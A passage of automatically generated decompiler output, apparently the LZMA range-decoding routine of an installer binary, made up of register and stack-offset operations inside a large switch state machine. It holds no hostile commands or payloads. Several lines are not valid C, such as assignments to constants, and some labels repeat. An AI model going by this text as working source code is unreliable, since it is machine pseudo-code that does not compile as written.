                                                                                                                                                                                                              										case 9:
                                                                                                                                                                                                              											L73:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												goto L90;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L74:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                              											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L75:
                                                                                                                                                                                                              											__eax = 0;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                              											__eflags = _t259;
                                                                                                                                                                                                              											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                                                              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                                                              											goto L76;
                                                                                                                                                                                                              										case 0xa:
                                                                                                                                                                                                              											L82:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												L84:
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              												goto L132;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L83:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              											goto L89;
                                                                                                                                                                                                              										case 0xb:
                                                                                                                                                                                                              											L85:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              											L89:
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              											L90:
                                                                                                                                                                                                              											__eax =  *(__ebp - 4);
                                                                                                                                                                                                              											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                              											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              											goto L69;
                                                                                                                                                                                                              										case 0xc:
                                                                                                                                                                                                              											L99:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												L164:
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L100:
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t334 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t334;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              											goto L101;
                                                                                                                                                                                                              										case 0xd:
                                                                                                                                                                                                              											L37:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												L159:
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L38:
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t122 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t122;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L39:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              												goto L48;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L40:
                                                                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                                                                              												goto L54;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L41:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                              											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                                                                              											__eax = __eax << 8;
                                                                                                                                                                                                              											__eax = __eax + __ebx;
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              											__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												__cx = __ax;
                                                                                                                                                                                                              												 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              												0x800 = 0x800 - __edx;
                                                                                                                                                                                                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              												goto L39;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												L45:
                                                                                                                                                                                                              												goto L37;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 0xe:
                                                                                                                                                                                                              											L46:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												L160:
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L47:
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t156 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t156;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                                              												L48:
                                                                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                                                                              													break;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												L49:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__edx = __ebx + __ebx;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													__cx = __ax;
                                                                                                                                                                                                              													_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                              													__ebx = _t170;
                                                                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													continue;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													L53:
                                                                                                                                                                                                              													goto L46;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L54:
                                                                                                                                                                                                              											_t173 = __ebp - 0x34;
                                                                                                                                                                                                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                              											__eflags =  *_t173;
                                                                                                                                                                                                              											goto L55;
                                                                                                                                                                                                              										case 0xf:
                                                                                                                                                                                                              											L58:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												L161:
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L59:
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t203 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t203;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L60:
                                                                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                                                                              												L55:
                                                                                                                                                                                                              												__al =  *(__ebp - 0x44);
                                                                                                                                                                                                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                              												goto L56;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L61:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__edx = __ebx + __ebx;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              											__esi = __edx + __eax;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												__cx = __ax;
                                                                                                                                                                                                              												_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                              												__ebx = _t217;
                                                                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              												0x800 = 0x800 - __edi;
                                                                                                                                                                                                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              												goto L60;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												L65:
                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 0x10:
                                                                                                                                                                                                              											L109:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												L165:
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L110:
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t365 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t365;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											goto L111;
                                                                                                                                                                                                              										case 0x11:
                                                                                                                                                                                                              											L69:
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x58);
                                                                                                                                                                                                              											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                                              											goto L132;
                                                                                                                                                                                                              										case 0x12:
                                                                                                                                                                                                              											L128:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												L131:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                              												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                              												L132:
                                                                                                                                                                                                              												 *(_t644 - 0x54) = _t642;
                                                                                                                                                                                                              												goto L133;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L129:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                              											goto L130;
                                                                                                                                                                                                              										case 0x13:
                                                                                                                                                                                                              											L141:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												L143:
                                                                                                                                                                                                              												_t469 = __ebp - 0x58;
                                                                                                                                                                                                              												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                              												__eflags =  *_t469;
                                                                                                                                                                                                              												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                              												 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                              												L144:
                                                                                                                                                                                                              												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                                                                                                                                              												L145:
                                                                                                                                                                                                              												 *(_t644 - 0x50) = 1;
                                                                                                                                                                                                              												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                                                              												goto L149;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L142:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              											 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                              											L130:
                                                                                                                                                                                                              											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              											 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                              											goto L144;
                                                                                                                                                                                                              										case 0x14:
                                                                                                                                                                                                              											L156:
                                                                                                                                                                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                                              												L140:
                                                                                                                                                                                                              												 *(_t644 - 0x88) = _t537;
                                                                                                                                                                                                              												goto L1;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 0x15:
                                                                                                                                                                                                              											L91:
                                                                                                                                                                                                              											__eax = 0;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              											__al = __al & 0x000000fd;
                                                                                                                                                                                                              											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              											goto L120;
                                                                                                                                                                                                              										case 0x16:
                                                                                                                                                                                                              											goto L0;
                                                                                                                                                                                                              										case 0x17:
                                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                                              												L145:
                                                                                                                                                                                                              												 *(_t644 - 0x50) = 1;
                                                                                                                                                                                                              												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                                                              												goto L149;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 0x18:
                                                                                                                                                                                                              											goto L146;
                                                                                                                                                                                                              										case 0x19:
                                                                                                                                                                                                              											L94:
                                                                                                                                                                                                              											__eflags = __ebx - 4;
                                                                                                                                                                                                              											if(__ebx < 4) {
                                                                                                                                                                                                              												L98:
                                                                                                                                                                                                              												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                              												L119:
                                                                                                                                                                                                              												_t393 = __ebp - 0x2c;
                                                                                                                                                                                                              												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                              												__eflags =  *_t393;
                                                                                                                                                                                                              												L120:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												if(__eax == 0) {
                                                                                                                                                                                                              													L166:
                                                                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												L121:
                                                                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                              												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                              													goto L171;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												L122:
                                                                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              												_t400 = __ebp - 0x60;
                                                                                                                                                                                                              												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                              												__eflags =  *_t400;
                                                                                                                                                                                                              												goto L123;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L95:
                                                                                                                                                                                                              											__ecx = __ebx;
                                                                                                                                                                                                              											__eax = __ebx;
                                                                                                                                                                                                              											__ecx = __ebx >> 1;
                                                                                                                                                                                                              											__eax = __ebx & 0x00000001;
                                                                                                                                                                                                              											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                              											__al = __al | 0x00000002;
                                                                                                                                                                                                              											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                              											__eflags = __ebx - 0xe;
                                                                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              											if(__ebx >= 0xe) {
                                                                                                                                                                                                              												L97:
                                                                                                                                                                                                              												__ebx = 0;
                                                                                                                                                                                                              												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                              												L102:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                              												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              													L107:
                                                                                                                                                                                                              													__eax = __eax + __ebx;
                                                                                                                                                                                                              													 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                              													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                                                                              													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													L108:
                                                                                                                                                                                                              													__ebx = 0;
                                                                                                                                                                                                              													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              													 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              													 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                              													 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                              													L112:
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              														L118:
                                                                                                                                                                                                              														_t391 = __ebp - 0x2c;
                                                                                                                                                                                                              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                              														__eflags =  *_t391;
                                                                                                                                                                                                              														goto L119;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													L113:
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              													__esi = __edi + __eax;
                                                                                                                                                                                                              													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              													__ax =  *__esi;
                                                                                                                                                                                                              													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                              													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                                              														__ecx = 0;
                                                                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                                              														__ecx = 1;
                                                                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                              														__ebx = 1;
                                                                                                                                                                                                              														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                                              														__ebx = 1 << __cl;
                                                                                                                                                                                                              														__ecx = 1 << __cl;
                                                                                                                                                                                                              														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                                              														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                                              														__cx = __ax;
                                                                                                                                                                                                              														__cx = __ax >> 5;
                                                                                                                                                                                                              														__eax = __eax - __ecx;
                                                                                                                                                                                                              														__edi = __edi + 1;
                                                                                                                                                                                                              														__eflags = __edi;
                                                                                                                                                                                                              														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              														 *__esi = __ax;
                                                                                                                                                                                                              														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                                              														0x800 = 0x800 - __ecx;
                                                                                                                                                                                                              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                              														 *__esi = __dx;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              														L111:
                                                                                                                                                                                                              														_t368 = __ebp - 0x48;
                                                                                                                                                                                                              														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                                              														__eflags =  *_t368;
                                                                                                                                                                                                              														goto L112;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														L117:
                                                                                                                                                                                                              														goto L109;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												L103:
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
